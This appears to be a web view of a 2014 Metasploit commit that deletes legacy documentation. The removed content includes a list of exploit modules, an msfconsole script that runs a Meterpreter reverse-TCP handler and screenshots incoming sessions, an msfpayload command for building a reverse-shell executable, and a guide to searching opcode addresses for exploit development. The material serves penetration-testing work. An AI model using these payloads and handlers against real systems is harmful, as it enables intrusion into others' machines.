
Squashed commit of the following:

commit 7f659547b3
Author: Tod Beardsley <todb@metasploit.com>
Date:   Mon Dec 1 07:54:53 2014 -0600

    Add a pointer to true and correct docs

    See #4000. Seems kind of pointless to ship all these bytes when we host
    everything on GitHub and provide tools to generate docs yourself.

commit 01668c8529
Author: Tod Beardsley <todb@metasploit.com>
Date:   Mon Dec 1 07:39:11 2014 -0600

    Remove old documentation

    The last significant commit in this directory was a844b5c3, which
    touched a sample browser module. Before that, changes were either
    ranging across the codebase, or surgical removal of out of date
    documentation.

    This all is looking to me like fairly useless historical artifacts.

    See #4000 for more discussion.
Tod Beardsley 5 years ago
parent
commit
4c880629c3
39 changed files with 34 additions and 11629 deletions
  1. 34
    0
      documentation/README.md
  2. 0
    7520
      documentation/developers_guide.pdf
  3. 0
    1
      documentation/gendocs.sh
  4. 0
    5
      documentation/metasploit2/README
  5. 0
    161
      documentation/metasploit2/exploits.txt
  6. 0
    49
      documentation/msfconsole_rc_ruby_example.rc
  7. 0
    338
      documentation/msfopcode.txt
  8. 0
    166
      documentation/msfrpc.txt
  9. 0
    77
      documentation/posix_meterpreter.txt
  10. 0
    87
      documentation/rpm/metasploit.spec
  11. 0
    34
      documentation/samples/framework/dump_module_info.rb
  12. 0
    30
      documentation/samples/framework/encode_file.rb
  13. 0
    20
      documentation/samples/framework/enumerate_modules.rb
  14. 0
    52
      documentation/samples/framework/run_exploit_using_base.rb
  15. 0
    68
      documentation/samples/framework/run_exploit_using_core.rb
  16. 0
    45
      documentation/samples/modules/auxiliary/sample.rb
  17. 0
    35
      documentation/samples/modules/encoders/sample.rb
  18. 0
    149
      documentation/samples/modules/exploits/ie_browser.rb
  19. 0
    85
      documentation/samples/modules/exploits/sample.rb
  20. 0
    34
      documentation/samples/modules/nops/sample.rb
  21. 0
    34
      documentation/samples/modules/payloads/singles/sample.rb
  22. 0
    40
      documentation/samples/modules/post/sample.rb
  23. 0
    207
      documentation/samples/pro/msfrpc_pro_discover.rb
  24. 0
    225
      documentation/samples/pro/msfrpc_pro_exploit.rb
  25. 0
    91
      documentation/samples/pro/msfrpc_pro_import.rb
  26. 0
    148
      documentation/samples/pro/msfrpc_pro_nexpose.rb
  27. 0
    43
      documentation/samples/scripts/meterpreter_script_template.rb
  28. 0
    132
      documentation/samples/scripts/resource_script.rb
  29. 0
    5
      documentation/samples/vulnapps/exploitme-posix/Makefile
  30. 0
    105
      documentation/samples/vulnapps/exploitme-posix/exploitme-posix.c
  31. 0
    18
      documentation/samples/vulnapps/php/test.php
  32. 0
    17
      documentation/samples/vulnapps/testsrv/Makefile
  33. 0
    2
      documentation/samples/vulnapps/testsrv/README
  34. 0
    129
      documentation/samples/vulnapps/testsrv/testsrv.c
  35. BIN
      documentation/samples/vulnapps/testsrv/testsrv.exe
  36. 0
    910
      documentation/users_guide.tex
  37. BIN
      documentation/users_guide_4.2.pdf
  38. BIN
      documentation/users_guide_4.3.pdf
  39. 0
    567
      documentation/wmap.txt

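--- a/documentation/README.md
+++ b/documentation/README.md
@@ -0,0 +1,34 @@
+# Metasploit Developer Documentation
+
+*(last updated December 1, 2014)
+
+Metasploit is actively supported by a community of hundreds of
+contributors and thousands of users world-wide. As a result, the
+accompanying documentation moves quite quickly.
+
+The best source of documentation on Metasploit development is
+https://github.com/rapid7/metasploit-framework/wiki. There are many
+treasures there, such as:
+
+  * [Evading Antivirus](https://github.com/rapid7/metasploit-framework/wiki/Evading-Anti-Virus)
+  * [How Payloads Work](https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work)
+  * [How to use Datastore Options](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options)
+  * [How to write browser exploits with BES](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer)
+  * [How to write a bruteforcer](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Msf%3A%3AAuxiliary%3A%3AAuthBrute-to-write-a-bruteforcer)
+
+...and many, many more.
+
+## API Documentation
+
+If you are looking for API documentation, you may run `rake yard` to
+generate a navigatable view of the comment documentation used throughout
+Metasploit, or visit https://rapid7.github.io/metasploit-framework/api
+for a recently generated online version.
+
+## Contributing
+
+If you would like to contribute to the documentation effort, please see
+http://yardoc.org/ for details on how to write YARD-compatible comments,
+and send us a [Pull Request](https://github.com/rapid7/metasploit-framework/pulls)
+with your contribution.
+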

+ 0
- 7520
documentation/developers_guide.pdf
File diff suppressed because it is too large


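--- a/documentation/gendocs.sh
+++ b/documentation/gendocs.sh
@@ -1 +0,0 @@
-rake yard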

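--- a/documentation/metasploit2/README
+++ b/documentation/metasploit2/README
@@ -1,5 +0,0 @@
-This directory contains 2.7 -> 3.0 compatibility information.
-
-
-Exploit Modules: exploits.txt
-Payload Modules: payloads.txt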

+ 0
- 161
documentation/metasploit2/exploits.txt View File

@@ -1,161 +0,0 @@
1
-Unfinished modules
2
-==================
3
-
4
-	arkeia_agent_access
5
-	gnu_mailutils_imap4d
6
-	hpux_ftpd_preauth_list
7
-	iis_source_dumper
8
-	phpnuke_search_module
9
-	realvnc_41_bypass
10
-	solaris_snmpxdmid
11
-	sygate_policy_manager
12
-	uow_imap4_copy
13
-	uow_imap4_lsub - partially (linux/imap/imap_uw_lsub.rb)
14
-	wzdftpd_sitem
15
-
16
-
17
-Completed modules
18
-=================
19
-
20
-	afp_loginext exploit/osx/afp/loginext
21
-	aim_goaway exploit/windows/browser/aim_goaway
22
-	altn_webadmin exploit/windows/http/altn_webadmin
23
-	apache_chunked_win32 exploit/windows/http/apache_chunked
24
-	arkeia_type77_macos exploit/osx/arkeia/type77
25
-	arkeia_type77_win32 exploit/windows/arkeia/type77
26
-	awstats_configdir_exec exploit/unix/webapp/awstats_configdir_exec
27
-	barracuda_img_exec exploit/unix/webapp/barracuda_img_exec
28
-	backupexec_agent exploit/windows/backupexec/remote_agent
29
-	backupexec_dump auxiliary/admin/backupexec/dump
30
-	backupexec_ns exploit/windows/backupexec/name_service
31
-	backupexec_registry auxiliary/admin/backupexec/registry
32
-	badblue_ext_overflow exploit/windows/http/badblue_ext_overflow
33
-	bakbone_netvault_heap exploit/windows/misc/bakbone_netvault_heap
34
-	blackice_pam_icq exploit/windows/firewall/blackice_pam_icq
35
-	bluecoat_winproxy exploit/windows/proxy/bluecoat_winproxy_host
36
-	bomberclone_overflow_win32 exploit/windows/misc/bomberclone_overflow
37
-	cabrightstor_disco exploit/windows/brightstor/discovery_udp
38
-	cabrightstor_disco_servicepc exploit/windows/brightstor/discovery_tcp
39
-	cabrightstor_sqlagent exploit/windows/brightstor/sql_agent
40
-	cabrightstor_uniagent exploit/windows/brightstor/universal_agent
41
-	cacam_logsecurity_win32 exploit/windows/unicenter/cam_log_security
42
-	cacti_graphimage_exec exploit/unix/webapp/cacti_graphimage_exec
43
-	calicclnt_getconfig exploit/windows/license/calicclnt_getconfig
44
-	calicserv_getconfig exploit/windows/license/calicserv_getconfig
45
-	cesarftp_mkd exploit/windows/ftp/cesarftp_mkd
46
-	distcc_exec exploit/unix/misc/distcc_exec
47
-	edirectory_imonitor exploit/windows/http/edirectory_imonitor
48
-	edirectory_imonitor2 exploit/windows/http/edirectory_host
49
-	eiq_license exploit/windows/misc/eiqnetworks_esa
50
-	eudora_imap exploit/windows/imap/eudora_list
51
-	exchange2000_xexch50 exploit/windows/smtp/ms03_046_exchange2000_xexch50
52
-	firefox_queryinterface_linux exploit/multi/browser/firefox_queryinterface
53
-	firefox_queryinterface_osx exploit/multi/browser/firefox_queryinterface
54
-	freeftpd_user exploit/windows/ftp/freeftpd_user
55
-	freesshd_key_exchange exploit/windows/ssh/freesshd_key_exchange
56
-	freeftpd_key_exchange exploit/windows/ftp/freeftpd_key_exchange
57
-	futuresoft_tftpd exploit/windows/tftp/futuresoft_transfermode
58
-	globalscapeftp_user_input exploit/windows/ftp/globalscapeftp_input
59
-	google_proxystylesheet_exec exploit/unix/webapp/google_proxystylesheet_exec
60
-	hpux_lpd_exec exploit/hpux/lpd/cleanup_exec
61
-	ia_webmail exploit/windows/http/ia_webmail
62
-	icecast_header exploit/windows/http/icecast_header
63
-	ie_objecttype exploit/windows/browser/ms03_020_ie_objecttype
64
-	ie_vml_rectfill exploit/windows/browser/ms06_055_vml_method
65
-	ie_webview_setslice exploit/windows/browser/ms06_057_webview_setslice
66
-	ie_xp_pfv_metafile exploit/windows/browser/ms06_001_wmf_setabortproc
67
-	ie_createtextrange exploit/windows/browser/ms06_013_createtextrange
68
-	ie_iscomponentinstalled exploit/windows/browser/ie_iscomponentinstalled
69
-	ie_createobject exploit/windows/browser/ie_createobject
70
-	iis40_htr exploit/windows/iis/ms02_018_htr
71
-	iis50_printer_overflow exploit/windows/iis/ms01_023_printer
72
-	iis50_webdav_ntdll exploit/windows/iis/ms03_007_ntdll_webdav
73
-	iis_fp30reg_chunked exploit/windows/isapi/fp30reg_chunked
74
-	iis_nsiislog_post exploit/windows/isapi/nsiislog_post
75
-	iis_w3who_overflow exploit/windows/isapi/w3who_query
76
-	imail_imap_delete exploit/windows/imap/imail_delete
77
-	imail_ldap exploit/windows/ldap/imail_thc
78
-	irix_lpsched_exec exploit/irix/lpd/tagprinter_exec
79
-	kerio_auth exploit/windows/firewall/kerio_auth
80
-	lsass_ms04_011 exploit/windows/smb/ms04_011_lsass
81
-	mailenable_auth_header exploit/windows/http/mailenable_auth_header
82
-	mailenable_imap exploit/windows/imap/mailenable_status
83
-	mailenable_imap_w3c exploit/windows/imap/mailenable_w3c_select
84
-	maxdb_webdbm_get_overflow exploit/windows/http/maxdb_webdbm_get_overflow
85
-	mcafee_epolicy_source exploit/windows/http/mcafee_epolicy_source
86
-	mdaemon_imap_cram_md5 exploit/windows/imap/mdaemon_cram_md5
87
-	mercantec_softcart exploit/bsdi/softcart/mercantec_softcart
88
-	mercur_imap_select_overflow exploit/windows/imap/mercur_imap_select_overflow
89
-	mercury_imap exploit/windows/imap/mercury_rename
90
-	minishare_get_overflow exploit/windows/http/minishare_get_overflow
91
-	mozilla_compareto exploit/multi/browser/mozilla_compareto
92
-	ms05_030_nntp exploit/windows/nntp/ms05_030_nntp
93
-	ms05_039_pnp exploit/windows/smb/ms05_039_pnp
94
-	msasn1_ms04_007_killbill exploit/windows/smb/ms04_007_killbill
95
-	msmq_deleteobject_ms05_017 exploit/windows/dcerpc/ms05_017_msmq
96
-	msrpc_dcom_ms03_026 exploit/windows/dcerpc/ms03_026_dcom
97
-	mssql2000_preauthentication exploit/windows/mssql/ms02_056_hello
98
-	mssql2000_resolution exploit/windows/mssql/ms02_039_slammer
99
-	netapi_ms06_040 exploit/windows/smb/ms06_040_netapi
100
-	netterm_netftpd_user_overflow exploit/windows/ftp/netterm_netftpd_user
101
-	niprint_lpd exploit/windows/lpd/niprint
102
-	novell_messenger_acceptlang exploit/windows/http/novell_messenger_acceptlang
103
-	openview_connectednodes_exec exploit/unix/webapp/openview_connectednodes_exec
104
-	openview_omniback_exec exploit/unix/misc/openview_omniback_exec
105
-	oracle9i_xdb_ftp exploit/windows/ftp/oracle9i_xdb_ftp_unlock
106
-	oracle9i_xdb_ftp_pass exploit/windows/ftp/oracle9i_xdb_ftp_pass
107
-	oracle9i_xdb_http exploit/windows/http/oracle9i_xdb_pass
108
-	pajax_remote_exec exploit/unix/webapp/pajax_remote_exec
109
-	payload_handler exploit/multi/handler
110
-	peercast_url_linux exploit/linux/http/peercast_url
111
-	peercast_url_win32 exploit/windows/http/peercast_url
112
-	php_wordpress_lastpost exploit/unix/webapp/php_wordpress_lastpost
113
-	php_vbulletin_template exploit/unix/webapp/php_vbulletin_template
114
-	php_xmlrpc_eval exploit/unix/webapp/php_xmlrpc_eval
115
-	phpbb_highlight exploit/unix/webapp/phpbb_highlight
116
-	poptop_negative_read exploit/linux/pptp/poptop_negative_read
117
-	privatewire_gateway_win32 exploit/windows/http/privatewire_gateway
118
-	putty_ssh exploit/windows/ssh/putty_msg_debug
119
-	realserver_describe_linux exploit/multi/realserver/describe
120
-	realvnc_client exploit/windows/vnc/realvnc_client
121
-	rras_ms06_025 exploit/windows/smb/ms06_025_rras
122
-	rras_ms06_025_rasman exploit/windows/smb/ms06_025_rasmans_reg
123
-	rsa_iiswebagent_redirect exploit/windows/isapi/rsa_webagent_redirect
124
-	safari_safefiles_exec exploit/osx/browser/safari_metadata_archive
125
-	samba_nttrans exploit/multi/samba/nttrans
126
-	samba_trans2open_osx exploit/osx/samba/trans2open
127
-	samba_trans2open_solsparc exploit/solaris/samba/trans2open
128
-	sambar6_search_results exploit/windows/http/sambar6_search_results
129
-	smb_sniffer auxiliary/server/capture/smb
130
-	seattlelab_mail_55 exploit/windows/pop3/seattelab_pass
131
-	securecrt_ssh1 exploit/windows/ssh/securecrt_ssh1
132
-	sentinel_lm7_overflow exploit/windows/license/sentinel_lm7_udp
133
-	servu_mdtm_overflow exploit/windows/ftp/servu_mdtm
134
-	shixxnote_font exploit/windows/misc/shixxnote_font
135
-	shoutcast_format_win32 exploit/windows/http/shoutcast_format
136
-	slimftpd_list_concat exploit/windows/ftp/slimftpd_list_concat
137
-	solaris_dtspcd_noir exploit/solaris/dtspcd/heap_noir
138
-	solaris_lpd_exec exploit/solaris/lpd/sendmail_exec
139
-	solaris_lpd_unlink auxiliary/dos/solaris/lpd/cascade_delete
140
-	solaris_sadmind_exec exploit/solaris/sunrpc/solaris_sadmind_exec
141
-	solaris_ttyprompt exploit/solaris/telnet/ttyprompt
142
-	sphpblog_file_upload exploit/unix/webapp/sphpblog_file_upload
143
-	squid_ntlm_authenticate exploit/linux/proxy/squid_ntlm_authenticate
144
-	svnserve_date exploit/multi/svn/svnserve_date
145
-	sybase_easerver exploit/windows/http/sybase_easerver
146
-	tftpd32_long_filename exploit/windows/tftp/tftpd32_long_filename
147
-	trackercam_phparg_overflow exploit/windows/http/trackercam_phparg_overflow
148
-	ultravnc_client exploit/windows/vnc/ultravnc_client
149
-	ut2004_secure_linux exploit/linux/games/ut2004_secure
150
-	ut2004_secure_win32 exploit/windows/games/ut2004_secure
151
-	warftpd_165_user exploit/windows/ftp/warftpd_165_user
152
-	warftpd_165_pass exploit/windows/ftp/warftpd_165_pass
153
-	webstar_ftp_user exploit/osx/ftp/webstar_ftp_user
154
-	winamp_playlist_unc exploit/windows/browser/winamp_playlist_unc
155
-	windows_ssl_pct exploit/windows/ssl/ms04_011_pct
156
-	wins_ms04_045 exploit/windows/wins/ms04_045_wins
157
-	wmailserver_smtp exploit/windows/smtp/wmailserver
158
-	wsftp_server_503_mkd exploit/windows/ftp/wsftp_server_503_mkd
159
-	ypops_smtp exploit/windows/smtp/ypops_overflow1
160
-	zenworks_desktop_agent exploit/windows/novell/zenworks_desktop_agent
161
-

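--- a/documentation/msfconsole_rc_ruby_example.rc
+++ b/documentation/msfconsole_rc_ruby_example.rc
@@ -1,49 +0,0 @@
-#
-# Quick RC script to demonstrate the Ruby blocks in RC files
-#
-
-#
-# Generate a corresponding EXE using msfpayload (change 192.168.0.228 to your IP):
-# $ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.228 LPORT=4444 X > reverse.exe
-#
-
-use exploit/multi/handler
-set PAYLOAD windows/meterpreter/reverse_tcp
-set LPORT 4444
-set LHOST 192.168.0.228
-set ExitOnSession false
-
-exploit -j
-
-# The first sleep below is not necessary, but makes the output cleaner
-<ruby>
-	sleep(1)
-
-	print_status("Waiting on an incoming sessions...")
-	while (true)
-		framework.sessions.each_pair do |sid,s|
-			thost = s.session_host
-
-			# Ensure that stdapi has been loaded before running
-			if s.ext.aliases['stdapi']
-				print_status("Screenshotting session #{sid} #{thost}...")
-				s.console.run_single("screenshot -p #{thost}_#{sid}.jpg -v false -q 85")
-				print_status("Closing session #{sid} #{thost}...")
-				s.kill
-			else
-				print_status("Session #{sid} #{thost} active, but not yet configured")
-			end
-
-		end
-		sleep(1)
-	end
-
-	print_status("All done")
-</ruby>
-
-# Kill all open sessions
-sessions -K
-
-# Exit the console (optional)
-exit
-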

+ 0
- 338
documentation/msfopcode.txt View File

@@ -1,338 +0,0 @@
1
-Using the Opcode Database CLI (msfopcode)
2
-
3
-   The 3.0 version of the Metasploit Framework comes with a command line
4
-   interface to the Metasploit Opcode Database. This can be used instead
5
-   of the web-based wizard to easily search for portable opcode
6
-   addresses. The interface is provided through the msfopcode command
7
-   which is found in the root directory of the installation. This
8
-   interface is merely a front-end to a the
9
-   Rex::Exploitation::OpcodeDb::Client class interface that interfaces
10
-   with a HTTP-based XML protocol running on the Metasploit.com
11
-   web-server.
12
-
13
-   The interface itself provides a simplified interface to some of the
14
-   different aspects of the opcode database. When running the command
15
-   with no arguments, the following output is shown:
16
-
17
-$ ./msfopcode
18
-
19
-    Usage: msfopcode command
20
-
21
-SUPPORTED COMMANDS
22
-
23
-   stats       Display database statistics
24
-   locales     Display supported locales
25
-   metatypes   Display supported opcode meta types (Ex: jmp reg)
26
-   groups      Display supported opcode groups (Ex: esp => eip)
27
-   types       Display supported opcode types (Ex: jmp esp)
28
-   platforms   Display supported platforms
29
-   modules     Display information about specific modules
30
-   search      Search for opcodes given a set of criteria
31
-
32
-   The purpose of the stats command is to show the current database
33
-   statistics, such as the number of opcodes and modules currently
34
-   indexed by the database and the last time the database was updated.
35
-   The output to this command looks something like this:
36
-
37
-$ ./msfopcode stats
38
-
39
-Last Updated             : Sat Sep 03 01:32:00 CDT 2005
40
-Number of Opcodes        : 12177419
41
-Number of Opcode Types   : 320
42
-Number of Platforms      : 14
43
-Number of Architectures  : 1
44
-Number of Modules        : 17683
45
-Number of Module Segments: 71457
46
-Number of Module Imports : 2065492
47
-Number of Module Exports : 927637
48
-
49
-   The locales command lists the locales that are currently supported by
50
-   the database. In the future, more locales will be indexed to provided
51
-   a more complete view of opcode portability.
52
-
53
-$ ./msfopcode locales
54
-English
55
-French
56
-
57
-   The metatypes command lists the opcode meta types currently supported
58
-   by the database. An opcode meta type is defined as a general
59
-   categorization of opcodes based on the action they perform, such as
60
-   jumping to a register, performing a pop/pop/ret, and so on. The meta
61
-   type helps categorize different specific types of opcodes.
62
-
63
-$ ./msfopcode metatypes
64
-pop/pop/ret
65
-jmp reg
66
-call reg
67
-jmp [reg + offset]
68
-call [reg + offset]
69
-popad/ret
70
-popaw/ret
71
-push reg/ret
72
-
73
-   The groups command lists the opcode groups currently supported by the
74
-   database. The distinction between and opcode group and an opcode meta
75
-   type is that an opcode group associates opcodes based on the specific
76
-   action they perform, such as transitioning the instruction pointer to
77
-   the current value of a specific register, like esp.
78
-
79
-$ ./msfopcode groups
80
-eax => eip
81
-ebx => eip
82
-ecx => eip
83
-edx => eip
84
-edi => eip
85
-esi => eip
86
-ebp => eip
87
-esp => eip
88
-[esp + 8] => eip
89
-[reg + offset] => eip
90
-[esp + 0x10] => eip
91
-[esp + 0x20] => eip
92
-[reg] => eip
93
-
94
-   The types command lists all of the various specific opcode types
95
-   supported by the database. An opcode type is an instance of a specific
96
-   opcode or opcodes that form one logical instruction block, such as a
97
-   jmp esp. Opcode types are grouped together through the use of opcode
98
-   groups and meta types. A sampling of the output is shown below:
99
-
100
-$ ./msfopcode types
101
-jmp esp
102
-call esp
103
-push esp, ret
104
-jmp ebp
105
-call ebp
106
-push ebp, ret
107
-jmp eax
108
-...
109
-
110
-   The platforms command lists the currently supported operating system
111
-   versions broken down by major version and service pack. At this point,
112
-   the database supports Windows NT SP3 through Windows 2003 Server SP1.
113
-   The database does not take into account hot fixes. Optionally,
114
-   platforms can be filtered by specifying the -p option with an argument
115
-   that includes a text portion of the operating system name or version
116
-   to filter. For instance, specifying -p 2000 will return only Windows
117
-   2000 versions.
118
-
119
-$ ./msfopcode platforms
120
-Windows NT 4.0.3.0 SP3 (IA32)
121
-Windows NT 4.0.4.0 SP4 (IA32)
122
-Windows NT 4.0.5.0 SP5 (IA32)
123
-Windows NT 4.0.6.0 SP6 (IA32)
124
-Windows 2000 5.0.0.0 SP0 (IA32)
125
-Windows 2000 5.0.1.0 SP1 (IA32)
126
-Windows 2000 5.0.2.0 SP2 (IA32)
127
-Windows 2000 5.0.3.0 SP3 (IA32)
128
-Windows 2000 5.0.4.0 SP4 (IA32)
129
-Windows XP 5.1.0.0 SP0 (IA32)
130
-Windows XP 5.1.1.0 SP1 (IA32)
131
-Windows XP 5.1.2.0 SP2 (IA32)
132
-Windows 2003 Server 5.2.0.0 SP0 (IA32)
133
-Windows 2003 Server 5.2.1.0 SP1 (IA32)
134
-
135
-   One of the major features of the opcode database is that it indexes
136
-   detailed information about modules. For instance, the opcode database
137
-   currently contains information about imports, exports, segments, and
138
-   specific module attributes for every imported module in the database.
139
-   This makes it possible to cross reference different modules and do all
140
-   sorts of fun things. To extract information about modules, the modules
141
-   command can be used. The usage for this command is shown below:
142
-
143
-$ ./msfopcode modules -h
144
-
145
-    Usage: msfopcode modules
146
-
147
-OPTIONS:
148
-
149
-    -E        Include module export information
150
-    -I        Include module import information
151
-    -S        Include module segment information
152
-    -d        Display detailed output
153
-    -h        Help banner
154
-    -l   A comma separated list of locales to filter (Ex: English)
155
-    -m   A comma separated list of module names to filter (Ex: kernel32.dll,use
156
-r32.dll)
157
-    -p   A comma separated list of operating system names to filter (Ex: 2000,X
158
-P)
159
-    -x        Dump the raw XML response
160
-
161
-   The explanation in the usage for each option is fairly self
162
-   explanatory, but the basic idea is that it's possible to search the
163
-   database for modules with the ability to filter based on file name,
164
-   locale, and operating system version. For the results that are
165
-   returned, information about the module imports, exports, segments, and
166
-   detailed information can be displayed. For example, to see all of the
167
-   versions of kernel32.dll currently indexed in the database, the
168
-   following command would be run:
169
-
170
-$ ./msfopcode modules -m kernel32.dll
171
-
172
-Matching Modules
173
-================
174
-
175
-    Name          Base Address  Size     Version           Timestamp
176
-          Locale
177
-    ----          ------------  ----     -------           ---------
178
-          ------
179
-    kernel32.dll  0x77e70000    790528   5.0.2191.1        Tue Dec 14 17:20:09 CST 1999  French
180
-    kernel32.dll  0x77e40000    1056768  5.2.3790.1830031  Thu Mar 24 20:30:42 CST 2005  English
181
-    kernel32.dll  0x77e40000    999424   5.2.3790.3        Tue Mar 25 03:42:44 CST 2003  English
182
-    kernel32.dll  0x77f00000    385024   4.0.0.0           Fri Apr 25 15:33:31 CDT 1997  English
183
-    kernel32.dll  0x77ef0000    421888   4.0.0.0           Mon Mar 29 18:10:58 CST 1999  English
184
-    kernel32.dll  0x77f00000    385024   4.0.0.0           Sun Feb 28 17:49:07 CST 1999  English
185
-    kernel32.dll  0x77f00000    385024   4.0.0.0           Tue Jul 20 18:19:59 CDT 1999  English
186
-    kernel32.dll  0x77e80000    745472   5.0.2191.1        Wed Dec 01 01:37:24 CST 1999  English
187
-    kernel32.dll  0x77e80000    741376   5.0.2195.1600     Fri Jun 09 21:03:14 CDT 2000  English
188
-    kernel32.dll  0x77e80000    741376   5.0.2195.2778     Fri May 04 17:34:08 CDT 2001  English
189
-    kernel32.dll  0x77e80000    745472   5.0.2195.5400     Tue Jul 23 03:13:13 CDT 2002  English
190
-    kernel32.dll  0x7c4e0000    757760   5.0.2195.6688     Thu Jun 19 22:43:40 CDT 2003  English
191
-    kernel32.dll  0x77e60000    937984   5.1.2600.0        Sat Aug 18 01:33:02 CDT 2001  English
192
-    kernel32.dll  0x77e60000    942080   5.1.2600.11061    Thu Aug 29 06:40:40 CDT 2002  English
193
-    kernel32.dll  0x7c800000    999424   5.1.2600.21802    Wed Aug 04 03:56:36 CDT 2004  English
194
- 
195
-   If only the versions of kernel32.dll on Windows XP running on the
196
-   English locale were of concern, the results could be limited by
197
-   specifying more limiting parameters:
198
-$ ./msfopcode modules -m kernel32.dll -p XP -l English
199
-
200
-Matching Modules
201
-================
202
-
203
-    Name          Base Address  Size    Version         Timestamp
204
-       Locale
205
-    ----          ------------  ----    -------         ---------
206
-       ------
207
-    kernel32.dll  0x77e60000    937984  5.1.2600.0      Sat Aug 18 01:33:02 CDT 2001  English
208
-    kernel32.dll  0x77e60000    942080  5.1.2600.11061  Thu Aug 29 06:40:40 CDT 2002  English
209
-    kernel32.dll  0x7c800000    999424  5.1.2600.21802  Wed Aug 04 03:56:36 CDT 2004  English
210
-
211
-   To display detailed information about modules that match, the -d
212
-   parameter can be specified:
213
-
214
-$ ./msfopcode modules -m kernel32.dll -p XP -l English -d
215
-.-============================================
216
-
217
-  Name        : kernel32.dll
218
-  Base Address: 0x77e60000
219
-  Size        : 937984
220
-  Version     : 5.1.2600.0
221
-  Timestamp   : Sat Aug 18 01:33:02 CDT 2001
222
-  Locale      : English
223
-  Platforms   :
224
-
225
-    Windows XP 5.1.0.0 SP0 (IA32)
226
-
227
-.-============================================
228
-
229
-  Name        : kernel32.dll
230
-  Base Address: 0x77e60000
231
-  Size        : 942080
232
-  Version     : 5.1.2600.11061
233
-  Timestamp   : Thu Aug 29 06:40:40 CDT 2002
234
-  Locale      : English
235
-  Platforms   :
236
-
237
-    Windows XP 5.1.1.0 SP1 (IA32)
238
-
239
-.-============================================
240
-
241
-  Name        : kernel32.dll
242
-  Base Address: 0x7c800000
243
-  Size        : 999424
244
-  Version     : 5.1.2600.21802
245
-  Timestamp   : Wed Aug 04 03:56:36 CDT 2004
246
-  Locale      : English
247
-  Platforms   :
248
-
249
-    Windows XP 5.1.2.0 SP2 (IA32)
250
-
251
-   The real purpose behind the opcode database, however, is the ability
252
-   to search for specific opcodes across different operating system
253
-   versions with the ability to cross reference results in order to
254
-   determine return address portability. For that reason, the msfopcode
255
-   script provides the search command:
256
-$ ./msfopcode search -h
257
-
258
-    Usage: msfopcode search
259
-
260
-OPTIONS:
261
-
262
-    -M   A comma separated list of opcode meta types to filter (Ex: jmp reg)
263
-    -P   Results must span more than one operating system version
264
-    -a   A comma separated list of addresses to filter (Ex: 0x41424344)
265
-    -g   A comma separated list of opcode groups to filter (Ex: esp => eip)
266
-    -h   Help banner
267
-    -l   A comma separated list of locales to filter (Ex: English)
268
-    -m   A comma separated list of module names to filter (Ex: kernel32.dll,user32.dll)
269
-    -p   A comma separated list of operating system names to filter (Ex: 2000,XP)
270
-    -t   A semi-colon separated list of opcode types to filter (Ex: jmp esp,call esp)
271
-    -x   Dump the raw XML response
272
-
273
-   Like the modules command, the search command provides a way of
274
-   limiting the results that come back as a result of the search. In this
275
-   case, opcode results can be limited based on meta type, group, type,
276
-   operating system, module, locale, and even address. This makes it
277
-   possible to get fairly granular results in an intuitive manner.
278
-   Furthermore, the server can be instructed to only return results that
279
-   are portable in the event that the -P option is specified, although
280
-   there are currently some issues with this option being accurate.
281
-
282
-   To search for all occurrences of a ecx => eip opcode group in
283
-   ws2help.dll on Windows 2000 and XP, the following command could be
284
-   issued:
285
-
286
-$ ./msfopcode search -p 2000,XP -m ws2help.dll -g "ecx => eip"
287
-
288
-Opcodes
289
-=======
290
-
291
-    Address     Type           OS
292
-    -------     ----           --
293
-    0x74fa3112  call ecx       Windows 2000 5.0.0.0 SP0 (IA32) (ws2help.dll)
294
-                               Windows 2000 5.0.1.0 SP1 (IA32) (ws2help.dll)
295
-                               Windows 2000 5.0.2.0 SP2 (IA32) (ws2help.dll)
296
-                               Windows 2000 5.0.4.0 SP4 (IA32) (ws2help.dll)
297
-    0x71aa1224  push ecx, ret  Windows XP 5.1.0.0 SP0 (IA32) (ws2help.dll)
298
-                               Windows XP 5.1.1.0 SP1 (IA32) (ws2help.dll)
299
-    0x71aa396d  call ecx       Windows XP 5.1.0.0 SP0 (IA32) (ws2help.dll)
300
-                               Windows XP 5.1.1.0 SP1 (IA32) (ws2help.dll)
301
-    0x71aa3de3  call ecx       Windows XP 5.1.2.0 SP2 (IA32) (ws2help.dll)
302
-    0x71aa163b  push ecx, ret  Windows XP 5.1.2.0 SP2 (IA32) (ws2help.dll)
303
-    0x75023112  call ecx       Windows 2000 5.0.0.0 SP0 (IA32) (ws2help.dll)
304
-                               Windows 2000 5.0.1.0 SP1 (IA32) (ws2help.dll)
305
-                               Windows 2000 5.0.2.0 SP2 (IA32) (ws2help.dll)
306
-                               Windows 2000 5.0.3.0 SP3 (IA32) (ws2help.dll)
307
-                               Windows 2000 5.0.4.0 SP4 (IA32) (ws2help.dll)
308
-
309
-   To limit the results to portable ones only, the -P option can be
310
-   tagged on producing output like that shown below:
311
-
312
-$ ./msfopcode search -p 2000,XP -m ws2help.dll -g "ecx => eip" -P
313
-
314
-Opcodes
315
-=======
316
-
317
-    Address     Type           OS
318
-    -------     ----           --
319
-    0x74fa3112  call ecx       Windows 2000 5.0.0.0 SP0 (IA32) (ws2help.dll)
320
-                               Windows 2000 5.0.1.0 SP1 (IA32) (ws2help.dll)
321
-                               Windows 2000 5.0.2.0 SP2 (IA32) (ws2help.dll)
322
-                               Windows 2000 5.0.4.0 SP4 (IA32) (ws2help.dll)
323
-    0x71aa1224  push ecx, ret  Windows XP 5.1.0.0 SP0 (IA32) (ws2help.dll)
324
-                               Windows XP 5.1.1.0 SP1 (IA32) (ws2help.dll)
325
-    0x71aa396d  call ecx       Windows XP 5.1.0.0 SP0 (IA32) (ws2help.dll)
326
-                               Windows XP 5.1.1.0 SP1 (IA32) (ws2help.dll)
327
-    0x75023112  call ecx       Windows 2000 5.0.0.0 SP0 (IA32) (ws2help.dll)
328
-                               Windows 2000 5.0.1.0 SP1 (IA32) (ws2help.dll)
329
-                               Windows 2000 5.0.2.0 SP2 (IA32) (ws2help.dll)
330
-                               Windows 2000 5.0.3.0 SP3 (IA32) (ws2help.dll)
331
-                               Windows 2000 5.0.4.0 SP4 (IA32) (ws2help.dll)
332
-
333
-   For custom development purposes, the script can also be told to dump
334
-   results in raw XML format such that extensions can be written to the
335
-   interface in the future by third parties. This can be accomplished by
336
-   specifying the -x parameter.
337
-
338
-More information online at: http://metasploit.com/framework/

+ 0
